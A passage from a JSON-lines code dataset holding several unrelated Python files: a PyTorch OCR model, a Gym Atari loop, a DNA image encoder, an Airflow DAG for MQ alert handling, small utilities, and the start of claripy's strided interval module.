self.score_scale)\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"436902","text":"import gym\nenvs = ['MontezumaRevenge-ram-v0', 'Breakout-v0']\nenv = gym.make(envs[1])\nprint(env.action_space)\nprint(env.observation_space)\nfor i_episode in range(1):\n observation = env.reset()\n for t in range(10000):\n env.render()\n print(observation)\n action = env.action_space.sample()\n observation, reward, done, info = env.step(action)\n # input()\n if done:\n print(\"Episode finished after {} timesteps\".format(t+1))\n 
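The increase_speed method in the settings.py record above scales difficulty geometrically: each level-up multiplies the speeds by speedup_scale (1.1) and the points by score_scale (1.5), truncating points to an int. A quick trace of how those factors compound over five level-ups (printed floats are approximate):

corgi_speed, kitty_points = 1.5, 100
for level in range(1, 6):
    corgi_speed *= 1.1
    kitty_points = int(kitty_points * 1.5)
    print(level, round(corgi_speed, 2), kitty_points)
# roughly: 1 1.65 150, 2 1.82 225, 3 2.0 337, 4 2.2 505, 5 2.42 757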
break\nenv.close()\n","sub_path":"trials/atari.py","file_name":"atari.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"257688994","text":"from torch import nn\nimport torch\nfrom einops import rearrange\n\n\nclass BidirectionalLSTM(nn.Module):\n    \"\"\"\n    Bidirectional LSTM layer.\n    Args:\n        input_size: input feature size\n        hidden_size: hidden-layer feature size\n        output_size: output feature size\n    Shape:\n        input: (S, N, V) sequence, batch, feature size\n        output: same as input\n    \"\"\"\n    def __init__(self, input_size, hidden_size, output_size):\n        super(BidirectionalLSTM, self).__init__()\n\n        self.rnn = nn.LSTM(input_size, hidden_size, bidirectional=True)\n        self.fc = nn.Linear(hidden_size * 2, output_size)\n\n    def forward(self, input):\n        recurrent, _ = self.rnn(input)\n        output = self.fc(recurrent)\n        return output\n\nclass PositionEmbedding(nn.Module):\n\n    def __init__(self, fm_size, head_channels, is_abs=True):\n        super(PositionEmbedding, self).__init__()\n        fm_size = (fm_size, fm_size) if not isinstance(fm_size, tuple) else fm_size\n        height, weight = fm_size\n        scale = head_channels ** -0.5\n        self.f_size = fm_size\n        self.is_abs = is_abs\n        if is_abs:\n            self.height = nn.Parameter(torch.randn(height, 1, head_channels) * scale)\n            self.weight = nn.Parameter(torch.randn(1, weight, head_channels) * scale)\n        else:\n            self.height = nn.Parameter(torch.randn(height * 2 - 1, head_channels) * scale)\n            self.weight = nn.Parameter(torch.randn(weight * 2 - 1, head_channels) * scale)\n\n    def forward(self, q):\n        '''q b,h,s,v'''\n        if self.is_abs:\n            emb = self.height + self.weight\n            h, w, c = emb.shape\n            emb = emb.reshape(h * w, c)\n            return torch.matmul(q, emb.transpose(0, 1))\n        else:\n            height, weight = self.f_size\n            n, h, s, v = q.shape\n            q = q.reshape(n, h, height, weight, v)\n            r_w = self.relative(q, self.weight)\n            n, h, x, i, y, j = r_w.shape\n            r_w = r_w.permute(0, 1, 2, 4, 3, 5).reshape(n, h, x * y, i * j)\n\n            q = q.permute(0, 1, 3, 2, 4)\n            r_h = self.relative(q, self.height)\n            r_h = r_h.permute(0, 1, 2, 4, 3, 5).reshape(n, h, x * y, i * j)\n\n            return r_w + r_h\n\n    def relative(self, q, rel_k):\n        temp = torch.matmul(q, rel_k.transpose(0, 1))\n        n, h, x, y, r = temp.shape\n        temp = temp.reshape(n, h * x, y, r)\n        temp = self.to_abs(temp).reshape(n, h, x, y, y)\n        temp = temp.unsqueeze(dim=3)\n        expand_shape = [-1] * len(temp.shape)\n        expand_shape[3] = x\n        return temp.expand(*expand_shape)\n\n    @staticmethod\n    def to_abs(input_):\n        b, h, l, _ = input_.shape\n        dd = {'device': input_.device, 'dtype': input_.dtype}\n        col_pad = torch.zeros((b, h, l, 1), **dd)\n        input_ = torch.cat((input_, col_pad), dim=3)\n        _b, _h, _l, _c = input_.shape\n        flat_x = input_.reshape(_b, _h, _l * _c)\n        flat_pad = torch.zeros((b, h, l - 1), **dd)\n        flat_x_padded = torch.cat((flat_x, flat_pad), dim=2)\n        final_x = flat_x_padded.reshape(b, h, l + 1, 2 * l - 1)\n        final_x = final_x[:, :, :l, (l - 1):]\n        return final_x\n\n\nclass MultiHeadSelfAttention(nn.Module):\n\n    def __init__(self, channels, feature_map_size, num_head=4, head_channels=128, is_abs=True):\n        \"\"\"\n        Multi-head self-attention over an image feature map.\n        :param channels: number of channels\n        :param feature_map_size: size of the input feature map\n        :param num_head: number of attention heads\n        :param head_channels: number of channels per head\n        :param is_abs: whether to use absolute position embeddings\n        \"\"\"\n        super(MultiHeadSelfAttention, self).__init__()\n        self.channels = channels\n\n        self.num_head = num_head\n        self.scale = head_channels ** -0.5\n        self.to_qkv = nn.Conv2d(self.channels, num_head * head_channels * 3, 1, bias=False)\n        self.position = PositionEmbedding(feature_map_size, head_channels, is_abs)\n        self.out_linear = 
nn.Conv2d(num_head * head_channels, self.channels, 1, bias=False)\n\n    def forward(self, x):\n        '''split out q, k, v'''\n        n, _, height, weight = x.shape\n        q, k, v = self.to_qkv(x).chunk(3, dim=1)\n        n, c, h, w = q.shape\n        '''n,head v ,x,y ---> n,head,s,v'''\n        q = q.reshape(n, self.num_head, c // self.num_head, h, w).permute(0, 1, 3, 4, 2).reshape(n, self.num_head, h * w, c // self.num_head)\n        k = k.reshape(n, self.num_head, c // self.num_head, h, w).permute(0, 1, 3, 4, 2).reshape(n, self.num_head, h * w, c // self.num_head)\n        v = v.reshape(n, self.num_head, c // self.num_head, h, w).permute(0, 1, 3, 4, 2).reshape(n, self.num_head, h * w, c // self.num_head)\n\n        qk = torch.matmul(q, k.transpose(-1, -2))  # n,h,s,v ===> n,h,s,s\n        qk = qk * self.scale\n\n        qr = self.position(q)\n\n        attention = torch.matmul(torch.softmax(qk + qr, dim=-1), v)\n        n, h, s, v = attention.shape\n\n        attention = attention.permute(0, 1, 3, 2).reshape(n, h * v, height, weight)\n        return self.out_linear(attention)\n\n\nclass DownSample(nn.Module):\n    \"\"\"Downsampling layer\"\"\"\n\n    def __init__(self, in_channels, out_channels):\n        \"\"\"\n        :param in_channels: number of input channels\n        :param out_channels: number of output channels\n        \"\"\"\n        super(DownSample, self).__init__()\n        self.layer = nn.Sequential(\n            nn.Conv2d(in_channels * 4, out_channels, 3, 1, 1, bias=False),\n            nn.BatchNorm2d(out_channels),\n            nn.LeakyReLU(0.1)\n        )\n\n    def forward(self, input_):\n        return self.layer(torch.cat(\n            (input_[:, :, ::2, ::2], input_[:, :, ::2, 1::2], input_[:, :, 1::2, ::2], input_[:, :, 1::2, 1::2]), 1\n        ))\n\n\nclass ResBlock(nn.Module):\n\n    def __init__(self, channels):\n        super(ResBlock, self).__init__()\n        self.layer = nn.Sequential(\n            nn.Conv2d(channels, channels, 3, 1, 1, bias=False),\n            nn.BatchNorm2d(channels),\n            nn.LeakyReLU(0.1),\n            nn.Conv2d(channels, channels, 3, 1, 1, bias=False),\n            nn.BatchNorm2d(channels),\n            nn.LeakyReLU(0.1),\n        )\n\n    def forward(self, input_):\n        return self.layer(input_) + input_\n\n\nclass BottleBlock(nn.Module):\n    def __init__(\n            self,\n            *,\n            channels,\n            fmap_size,\n            heads=8,\n            dim_head=128,\n            is_abs=True,\n            activation=nn.LeakyReLU(0.1)\n    ):\n        super().__init__()\n\n        self.net = nn.Sequential(\n            nn.Conv2d(channels, 2*channels, 3, 1, 1, bias=False),\n            nn.BatchNorm2d(2*channels),\n            activation,\n            MultiHeadSelfAttention(2*channels, fmap_size, heads, dim_head),\n            nn.Conv2d(2*channels, channels, 3, 1, 1, bias=False),\n            nn.BatchNorm2d(channels),\n        )\n\n        self.activation = activation\n\n    def forward(self, x):\n        x = self.net(x)+x\n        return self.activation(x)\n\n\nclass OcrNet(nn.Module):\n\n    def __init__(self, num_class):\n        super(OcrNet, self).__init__()\n        self.cnn = nn.Sequential(\n            nn.BatchNorm2d(3),\n            DownSample(3, 64),\n            ResBlock(64),\n            ResBlock(64),\n            nn.Conv2d(64, 128, 3, 2, 1, bias=False),\n            nn.BatchNorm2d(128),\n            nn.LeakyReLU(0.1),\n            ResBlock(128),\n            ResBlock(128),\n            nn.Conv2d(128, 256, 3, 2, 1, bias=False),\n            nn.BatchNorm2d(256),\n            nn.LeakyReLU(0.1),\n            BottleBlock(channels=256, fmap_size=(6,18)),\n            BottleBlock(channels=256, fmap_size=(6, 18)),\n            BottleBlock(channels=256, fmap_size=(6, 18)),\n            nn.Conv2d(256, 512, 3, (2, 1), 1, bias=False),\n            nn.BatchNorm2d(512),\n            nn.LeakyReLU(0.1),\n            nn.Conv2d(512, 512, 3, 1, (0,1), bias=False),\n        )\n        self.rnn = nn.Sequential(\n            BidirectionalLSTM(512,256,128),\n            BidirectionalLSTM(128,128,num_class)\n        )\n\n    def forward(self, input_):\n        '''input_ of shape (3,48,144)'''\n        input_ = self.cnn(input_)\n        n, c, h, w = input_.shape  # n,c,h,w\n        assert h == 1\n        input_ = rearrange(input_, 'n c h w -> w n (c h)')\n        return 
self.rnn(input_)\n\n\nif __name__ == '__main__':\n m = OcrNet(70)\n x = torch.randn(36, 3, 48, 144)\n print(m(x).shape)\n","sub_path":"models/ocr_net.py","file_name":"ocr_net.py","file_ext":"py","file_size_in_byte":9034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"458293222","text":"import os\nfrom os import listdir\nfrom os.path import isfile, join\nfrom PIL import Image\nimport numpy as np\n\ndirectory='Output_Grayscale_img'\nmasterpath='data'\nif not os.path.exists(directory):\n os.makedirs(directory)\n\ndef Encode_Grayscale(masterpath):\n mypath=masterpath\n\n w, h = 1024,1024 \n w2, h2 = 64,64\n my_list = os.listdir(mypath)\n for i in range(len(my_list)):\n Subpath=mypath+'/'+my_list[i]\n imgpath=my_list[i]\n onlyfiles = [f for f in listdir(Subpath) if isfile(join(Subpath, f))]\n for s in range(0,len(onlyfiles)):\n\n data = np.zeros((h, w), dtype=np.uint8)\n\n x=''\n with open(Subpath + '/' + onlyfiles[s]) as f:\n content = f.readlines()\n\n content = [x.strip() for x in content] \n for k in range(1,len(content)):\n x+=content[k]\n i=int(w/2)-1\n j=int(h/2)-1\n\n for k in range (0,len(x)):\n if x[k]=='A' or x[k]=='a':\n i-=1\n j-=1\n if(i==-1 or i==w or j==-1 or j==h):\n i=int((w/2)-1)\n j=int((h/2)-1)\n data[i,j]+=255\n if x[k]=='C' or x[k]=='c':\n i-=1\n j+=1\n if(i==-1 or i==w or j==-1 or j==h):\n i=int((w/2)-1)\n j=int((h/2)-1)\n data[i,j]+=255\n if x[k]=='G' or x[k]=='g':\n i+=1\n j-=1\n if(i==-1 or i==w or j==-1 or j==h):\n i=int((w/2)-1)\n j=int((h/2)-1)\n data[i,j]+=255\n if x[k]=='T' or x[k]=='t':\n i+=1\n j+=1\n if(i==-1 or i==w or j==-1 or j==h):\n i=int((w/2)-1)\n j=int((h/2)-1)\n data[i,j]+=255\n\n\n img = Image.fromarray(data)\n new_image = img.resize((w2,h2))\n\n\n if not os.path.exists(directory+'/'+imgpath):\n os.makedirs(directory+'/'+imgpath)\n\n imagepath=directory+'/'+imgpath+'/'+onlyfiles[s]+'.png'\n new_image.save(imagepath)\n\nif __name__ == '__main__':\n Encode_Grayscale(masterpath)\n","sub_path":"Source Code/WalkIm_Grayscale_Encoding.py","file_name":"WalkIm_Grayscale_Encoding.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"641867865","text":"import os\n\ndef remove_dup(file_name):\n # read content\n file = open(file_name, 'r')\n lines = file.readlines()\n file.close()\n # erase and write new content\n file = open(file_name, 'w')\n unique = set(lines)\n for item in unique:\n file.write(item)\n file.close()\n\ndef add_query_time(filename):\n time = 0\n file = open(filename, 'r')\n tag_time = \"\\\"took\\\"\"\n for line in file:\n if line.find(tag_time) != -1:\n line = line.strip()\n line = line.split(\":\")[1]\n line = line.replace('\\\"', '')\n line = line.replace(',', '')\n time += int(line)\n print(\"time in file: \" + str(time))\n return time","sub_path":"query2/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"539502707","text":"from airflow import DAG\nimport subprocess\n\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\n\n\ndef check_prodId_access_func(**kwargs):\n ti = kwargs['ti']\n has_access = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n\n if has_access == 1:\n return 
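The WalkIm record above renders each sequence as a 2D walk: every nucleotide moves the cursor one step diagonally, out-of-bounds moves reset the cursor to the center, and each visited pixel is bumped by 255 (wrapping in uint8). The four-way if/elif chain collapses into a lookup table; a condensed sketch of the same walk (walk_image and STEPS are our names):

import numpy as np

STEPS = {'A': (-1, -1), 'C': (-1, 1), 'G': (1, -1), 'T': (1, 1)}

def walk_image(seq, size=1024):
    img = np.zeros((size, size), dtype=np.uint8)
    i = j = size // 2 - 1
    for base in seq.upper():
        if base not in STEPS:
            continue  # skip non-ACGT characters
        di, dj = STEPS[base]
        i, j = i + di, j + dj
        if not (0 <= i < size and 0 <= j < size):
            i = j = size // 2 - 1  # reset to the center, as the record does
        img[i, j] += 255  # uint8 arithmetic wraps modulo 256, matching data[i,j] += 255
    return img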
'get_cur_MQ_depth_max_MQ_depth'\n else:\n return 'L1_escalation'\n\ndef is_MQ_depth_below_threshold_func1(**kwargs):\n ti = kwargs['ti']\n current_mq_depth = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n threshold_mq_depth = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n\n if current_mq_depth < threshold_mq_depth:\n return 'resolution_module'\n else:\n return ''\n\ndef is_IPcmdb_ACTION_func(**kwargs):\n ti = kwargs['ti']\n action = ti.xcom_pull(task_ids='IPcmdb_ACTION', key='IPcmdb_ACTION')\n\n if action == 'ESCALATE':\n return 'L2_escalation'\n elif action == 'REPLY':\n return 'dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir'\n elif action == 'DUMP':\n return 'check_bailout_message_count_has_reached'\n elif action == 'MONITOR':\n return 'monitor_for_specific_time_based_on_freq'\n\n\ndef cycle_reply(**kwargs):\n\n while True:\n\n is_maching = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir\n\n # ti = kwargs['ti']\n # msg_ids = ti.xcom_pull(task_ids='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir', key='msg_id')\n # todo based on values it returns\n\n if is_maching:\n return 'L2_escalation'\n else:\n val = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for replay_err_msgs_err_q_to_process\n\n val2 = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for wait_for_configured_time\n\n val3 = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for check_backout_msgs_func\n\n if val3:\n val4 = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for BRANCH_compare_each_msgid_w_files_in_that_dir2\n else:\n return 'resolution_module'\n\n\ndef compare_each_msgid_w_files_in_that_dir_func(**kwargs):\n ti = kwargs['ti']\n msg_ids = ti.xcom_pull(task_ids='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir', key='msg_id')\n\n # todo based on values it returns\n is_maching = True\n if is_maching:\n return 'L2_escalation'\n else:\n\n return 'replay_err_msgs_err_q_to_process'\n\ndef compare_each_msgid_w_files_in_that_dir2_func(**kwargs):\n ti = kwargs['ti']\n msg_ids = ti.xcom_pull(task_ids='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir2', key='msg_id')\n\n # todo based on values it returns\n is_maching = True\n if is_maching:\n return 'L2_escalation'\n else:\n return 'replay_err_msgs_err_q_to_process'\n\n# def check_backout_msgs_func(**kwargs):\n# ti = kwargs['ti']\n# msg_ids = ti.xcom_pull(task_ids='# todo', key='msg_id')\n#\n# backout_message_result = True\n#\n# if backout_message_result:\n# return 'dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir'\n# else:\n# return 'resolution_module'\n\ndef check_bailout_message_count_has_reached_func(**kwargs):\n ti = kwargs['ti']\n count = ti.xcom_pull(task_ids='# todo may be new tas kto get data', key='disk_space')\n\n if count > 0: # todo fix numbers\n return 'L2_escalation'\n else:\n return 'check_disk_space'\n\ndef is_disk_space_func(**kwargs):\n\n ti = kwargs['ti']\n disk_space = ti.xcom_pull(task_ids='check_disk_space', key='disk_space')\n destroy = True # todo get this value\n\n if disk_space > 80:\n return 'L2_escalation'\n elif destroy:\n return 'dump_and_destroy_a_copy_of_msgs_from_QUEUE'\n else:\n return 'dump_a_copy_of_msgs_from_QUEUE'\n\ndef is_destroy(**kwargs):\n\n # todo get from bash execution the destroy value\n\n destroy = True\n\n if destroy:\n return 'dump_and_destroy_a_copy_of_msgs_from_QUEUE'\n else:\n return 'dump_a_copy_of_msgs_from_QUEUE'\n\ndef 
is_MQ_depth_below_threshold_func(**kwargs):\n ti = kwargs['ti']\n current_mq_depth = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n threshold_mq_depth = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n\n if current_mq_depth < threshold_mq_depth:\n return 'resolution_module'\n else:\n return 'L2_escalation'\n\n\n\n\ndefault_arg = {'owner': 'airflow', 'start_date': '2020-12-10'}\n\ndag = DAG(\n 'mq_modified',\n default_args=default_arg,\n schedule_interval=None,\n catchup=False,\n concurrency=1,\n max_active_runs=1\n)\n\nown_sock_alert = BashOperator(\n dag=dag,\n task_id='own_sock_alert',\n bash_command='echo 1',\n)\n\nfetch_alert_details = BashOperator(\n dag=dag,\n task_id='fetch_alert_details',\n bash_command='echo 2',\n)\n\nfetch_config_details_from_ipcmdb = BashOperator(\n dag=dag,\n task_id='fetch_config_details_from_ipcmdb',\n bash_command='echo 2',\n)\n\n############# PSW\n\ncheck_prodId_access = BashOperator( # maybe we dont need this step if fetch_config_details_from_ipcmdb task provide access details. So xcom_push can be done there.\n dag=dag,\n task_id='check_prodId_access',\n # bash_command='echo \"{{ ti.xcom_push(key=\"k1\", value=\"v1\") }}\" \"{{ti.xcom_push(key=\"k2\", value=\"v2\") }}\"',\n bash_command='echo \"{{ ti.xcom_push(key=\"prodId_access\", value=\" #todo later set this from script\") }}\"',\n)\n\nBRANCH_check_prodId_access = BranchPythonOperator(\n task_id='BRANCH_check_prodId_access',\n dag=dag,\n python_callable=check_prodId_access_func,\n)\n\nget_cur_MQ_depth_max_MQ_depth = BashOperator(\n dag=dag,\n task_id='get_cur_MQ_depth_max_MQ_depth',\n bash_command='echo \"{{ ti.xcom_push(key=\"current_mq_depth\", value=\"#todo\") }}\" \"{{ti.xcom_push(key=\"threshold_mq_depth\", value=\"#todo\") }}\"',\n)\n\n#############\n\nL1_escalation = BashOperator(\n dag=dag,\n task_id='L1_escalation',\n bash_command='echo 2',\n)\n\nBRANCH_is_MQ_depth_below_threshold1 = BranchPythonOperator(\n task_id='BRANCH_is_MQ_depth_below_threshold1',\n dag=dag,\n python_callable=is_MQ_depth_below_threshold_func1,\n)\n\nresolution_module = BashOperator(\n dag=dag,\n task_id='resolution_module',\n bash_command='echo 2',\n)\n############# ACTIONS\n\n\nIPcmdb_ACTION = BashOperator( # Not sure if the cvalue of ACTION can be taken from task fetch_config_details_from_ipcmdb ??\n dag=dag,\n task_id='IPcmdb_ACTION',\n bash_command='echo \"{{ ti.xcom_push(key=\"IPcmdb_ACTION\", value=\" #todo later set this from script\") }}\"',\n)\n\nBRANCH_ipcmdb_action = BranchPythonOperator(\n task_id='BRANCH_ipcmdb_action',\n dag=dag,\n python_callable=is_IPcmdb_ACTION_func,\n)\n\n## ESCALATE\n\nL2_escalation = BashOperator(\n dag=dag,\n task_id='L2_escalation',\n bash_command='echo 2',\n)\n\n## MONITOR\n\nmonitor_for_specific_time_based_on_freq = BashOperator(\n dag=dag,\n task_id='monitor_for_specific_time_based_on_freq',\n bash_command='echo 2',\n)\n\n## REPLY\n\n# dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir = BashOperator(\n# dag=dag,\n# task_id='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir',\n# bash_command='echo \"{{ ti.xcom_push(key=\"msg_id\", value=\" #todo later set this from script\") }}\"',\n# )\n\nBRANCH_cycle_reply = BranchPythonOperator(\n task_id='BRANCH_cycle_reply',\n dag=dag,\n python_callable=compare_each_msgid_w_files_in_that_dir_func,\n)\n\n# dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir2 = BashOperator(\n# dag=dag,\n# task_id='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir2',\n# bash_command='echo \"{{ 
ti.xcom_push(key=\"msg_id\", value=\" #todo later set this from script\") }}\"',\n# )\n#\n# BRANCH_compare_each_msgid_w_files_in_that_dir = BranchPythonOperator(\n# task_id='BRANCH_compare_each_msgid_w_files_in_that_dir',\n# dag=dag,\n# python_callable=compare_each_msgid_w_files_in_that_dir_func,\n# )\n#\n# BRANCH_compare_each_msgid_w_files_in_that_dir2 = BranchPythonOperator(\n# task_id='BRANCH_compare_each_msgid_w_files_in_that_dir2',\n# dag=dag,\n# python_callable=compare_each_msgid_w_files_in_that_dir2_func,\n# )\n#\n# replay_err_msgs_err_q_to_process = BashOperator(\n# dag=dag,\n# task_id='replay_err_msgs_err_q_to_process',\n# bash_command='echo 2',\n# )\n#\n# wait_for_configured_time = BashOperator(\n# dag=dag,\n# task_id='wait_for_configured_time',\n# bash_command='echo 2',\n# )\n#\n# BRANCH_check_backout_msgs = BranchPythonOperator(\n# task_id='BRANCH_check_backout_msgs',\n# dag=dag,\n# python_callable=check_backout_msgs_func,\n# )\n\n\n## DUMP\n\nBRANCH_check_bailout_message_count_has_reached = BranchPythonOperator(\n dag=dag,\n task_id='BRANCH_check_bailout_message_count_has_reached',\n python_callable=check_bailout_message_count_has_reached_func,\n)\n\ncheck_disk_space = BashOperator(\n dag=dag,\n task_id='check_disk_space',\n bash_command='echo \"{{ ti.xcom_push(key=\"disk_space\", value=\" #todo later set this from script\") }}\"',\n)\n\nBRANCH_is_disk_space = BranchPythonOperator(\n dag=dag,\n task_id='BRANCH_is_disk_space',\n python_callable=is_disk_space_func,\n)\n\nBRANCH_is_destroy = BranchPythonOperator(\n dag=dag,\n task_id='BRANCH_is_destroy',\n python_callable=is_destroy,\n)\n\ndump_and_destroy_a_copy_of_msgs_from_QUEUE = BashOperator(\n dag=dag,\n task_id='dump_and_destroy_a_copy_of_msgs_from_QUEUE',\n bash_command='echo 2',\n)\n\ndump_a_copy_of_msgs_from_QUEUE = BashOperator(\n dag=dag,\n task_id='dump_a_copy_of_msgs_from_QUEUE',\n bash_command='echo 2',\n)\n\nnotification_to_dump_loc = BashOperator(\n dag=dag,\n task_id='notification_to_dump_loc',\n bash_command='echo 2',\n)\n\nBRANCH_is_MQ_depth_below_threshold = BranchPythonOperator(\n task_id='BRANCH_is_MQ_depth_below_threshold',\n dag=dag,\n python_callable=is_MQ_depth_below_threshold_func,\n)\n\nSTOP = DummyOperator(\n dag=dag,\n task_id='stop',\n)\n\n\nown_sock_alert >> fetch_alert_details >> fetch_config_details_from_ipcmdb >> check_prodId_access >> BRANCH_check_prodId_access\nBRANCH_check_prodId_access >> L1_escalation >> STOP\nBRANCH_check_prodId_access >> get_cur_MQ_depth_max_MQ_depth >> BRANCH_is_MQ_depth_below_threshold1\n\nBRANCH_is_MQ_depth_below_threshold1 >> resolution_module >> STOP\nBRANCH_is_MQ_depth_below_threshold1 >> IPcmdb_ACTION >> BRANCH_ipcmdb_action\n\n# ESCALATE\nBRANCH_ipcmdb_action >> L2_escalation >> STOP\n\n# REPLY\n# BRANCH_ipcmdb_action >> dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir >> BRANCH_compare_each_msgid_w_files_in_that_dir\n#\n# BRANCH_compare_each_msgid_w_files_in_that_dir >> replay_err_msgs_err_q_to_process >> wait_for_configured_time >> BRANCH_check_backout_msgs\n# BRANCH_check_backout_msgs >> dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir2 >> BRANCH_compare_each_msgid_w_files_in_that_dir2 ## NOT ACYCLIC\n# BRANCH_check_backout_msgs >> resolution_module >> STOP\n\nBRANCH_ipcmdb_action >> BRANCH_cycle_reply\nBRANCH_cycle_reply >> resolution_module >> STOP\nBRANCH_cycle_reply >> L2_escalation >> STOP\n\n# MONITOR\nBRANCH_ipcmdb_action >> monitor_for_specific_time_based_on_freq >> BRANCH_is_MQ_depth_below_threshold\nBRANCH_is_MQ_depth_below_threshold >> 
L2_escalation >> STOP\nBRANCH_is_MQ_depth_below_threshold >> resolution_module >> STOP\n#\n# DUMP\nBRANCH_ipcmdb_action >> BRANCH_check_bailout_message_count_has_reached\nBRANCH_check_bailout_message_count_has_reached >> L2_escalation >> STOP\nBRANCH_check_bailout_message_count_has_reached >> BRANCH_is_disk_space\nBRANCH_is_disk_space >> L2_escalation >> STOP\nBRANCH_is_disk_space >> BRANCH_is_destroy\nBRANCH_is_destroy >> dump_and_destroy_a_copy_of_msgs_from_QUEUE >> notification_to_dump_loc >> BRANCH_is_MQ_depth_below_threshold\nBRANCH_is_destroy >> dump_a_copy_of_msgs_from_QUEUE >> notification_to_dump_loc >> BRANCH_is_MQ_depth_below_threshold\nBRANCH_is_MQ_depth_below_threshold >> L2_escalation >> STOP\nBRANCH_is_MQ_depth_below_threshold >> resolution_module >> STOP\n\n","sub_path":"mq_modified.py","file_name":"mq_modified.py","file_ext":"py","file_size_in_byte":12140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"564575549","text":"import fractions\nimport functools\nimport math\nimport itertools\nimport logging\n\nlogger = logging.getLogger('claripy.vsa.strided_interval')\n\nfrom ..backend_object import BackendObject\n\ndef reversed_processor(f):\n def processor(self, *args):\n if self._reversed:\n # Reverse it for real. We have to accept the precision penalty.\n reversed = self._reverse()\n return f(reversed, *args)\n return f(self, *args)\n\n return processor\n\ndef normalize_types(f):\n @functools.wraps(f)\n def normalizer(self, o):\n '''\n Convert any object to an object that we can process.\n '''\n # Special handler for union\n if f.__name__ == 'union' and isinstance(o, DiscreteStridedIntervalSet):\n return o.union(self)\n\n if isinstance(o, ValueSet) or isinstance(o, DiscreteStridedIntervalSet):\n # It should be put to o.__radd__(self) when o is a ValueSet\n return NotImplemented\n\n if isinstance(o, Base) or isinstance(self, Base):\n return NotImplemented\n if type(self) is BVV:\n self = self.value\n if type(o) is BVV:\n o = o.value\n if type(o) in (int, long):\n o = StridedInterval(bits=StridedInterval.min_bits(o), stride=0, lower_bound=o, upper_bound=o)\n if type(self) in (int, long):\n self = StridedInterval(bits=StridedInterval.min_bits(self), stride=0, lower_bound=self, upper_bound=self)\n\n if f.__name__ not in ('concat', ):\n # Make sure they have the same length\n common_bits = max(o.bits, self.bits)\n if o.bits < common_bits:\n o = o.zero_extend(common_bits)\n if self.bits < common_bits:\n self = self.zero_extend(common_bits)\n\n self_reversed = False\n\n if self._reversed != o._reversed:\n # We are working on two instances that have different endianness!\n # Make sure the `reversed` property of self is kept the same after operation\n if self._reversed:\n if o.is_integer:\n o = o._reverse()\n else:\n self_reversed = True\n self = self._reverse()\n\n else:\n # If self is an integer, we wanna reverse self as well\n if self.is_integer:\n self = self._reverse()\n self_reversed = True\n else:\n o = o._reverse()\n\n ret = f(self, o)\n if self_reversed and isinstance(ret, StridedInterval):\n ret = ret.reverse()\n return ret\n\n return normalizer\n\nsi_id_ctr = itertools.count()\n\n# Whether DiscreteStridedIntervalSet should be used or not. 
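The Airflow record that ends above is built almost entirely out of BranchPythonOperator nodes: each branch callable xcom_pulls some state and returns the task_id of the path to follow, and every terminal path funnels into a shared stop task. A stripped-down skeleton of that pattern (all task names here are illustrative, not the record's; the join task is given a trigger rule so the skipped branch does not skip it too):

from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import BranchPythonOperator

def choose(**kwargs):
    # BranchPythonOperator follows whichever task_id the callable returns
    ok = kwargs['ti'].xcom_pull(task_ids='probe', key='status')
    return 'handle_ok' if ok else 'escalate'

dag = DAG('branch_skeleton', default_args={'owner': 'airflow', 'start_date': '2020-12-10'},
          schedule_interval=None, catchup=False)

probe = BashOperator(task_id='probe', bash_command='echo 1', dag=dag)
branch = BranchPythonOperator(task_id='branch', python_callable=choose,
                              provide_context=True, dag=dag)
handle_ok = BashOperator(task_id='handle_ok', bash_command='echo ok', dag=dag)
escalate = BashOperator(task_id='escalate', bash_command='echo escalate', dag=dag)
stop = DummyOperator(task_id='stop', trigger_rule='none_failed', dag=dag)

probe >> branch >> [handle_ok, escalate]
[handle_ok, escalate] >> stop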
